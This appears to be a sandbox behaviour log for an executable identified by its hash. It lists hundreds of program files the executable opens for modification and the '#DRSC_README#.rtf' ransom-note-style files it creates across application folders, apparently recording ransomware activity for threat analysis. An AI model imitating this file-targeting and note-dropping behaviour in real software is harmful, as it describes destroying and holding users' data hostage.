710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\es.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Athens 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+9 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository_2.3.0.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Nauru 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Malta 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\jaccess.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\dependentlibs.list 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\Templates\Genko_2.jtp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\servertool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2launcher.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rankin_Inlet 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belem 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Panama 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Maldives 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\bg.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ant-javafx.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Jujuy 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\profile.jfc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-4 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\El_Salvador 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST7MDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.policy 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novokuznetsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sitka 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\sRGB.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dhaka 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\native2ascii.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Gaza 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\dnsns.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\net.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Mendoza 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Prague 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_fr.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\NOTICE 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\zh-TW.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Inuvik 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\US_export_policy.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\klist.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoBeta.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.shell_0.10.0.v201212101605.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Madeira 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lord_Howe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\meta-index 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MET 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\bn.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.util_1.0.500.v20130404-1337.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\uk.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Campo_Grande 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6CDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vilnius 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\UseUndo.midi 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Juneau 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Palmer 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Mail\wabmig.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fil.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Juan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-windows.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\eBook.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.ssl_1.1.0.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\America\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#DRSC_README#.rtf 